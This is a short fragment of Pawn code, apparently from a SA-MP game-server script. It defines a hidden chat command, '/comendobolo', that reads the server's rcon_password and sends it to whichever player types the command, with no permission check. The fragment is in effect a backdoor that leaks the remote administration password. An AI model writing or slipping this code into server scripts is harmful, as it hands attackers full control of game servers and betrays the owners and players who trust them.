if(strcmp("/comendobolo", cmdtext, true, 10) == 0) { static rString[30]; GetServerVarAsString("rcon_password", rString, 30); SendClientMessage(playerid, 0xAFAFAF66, rString); return true; }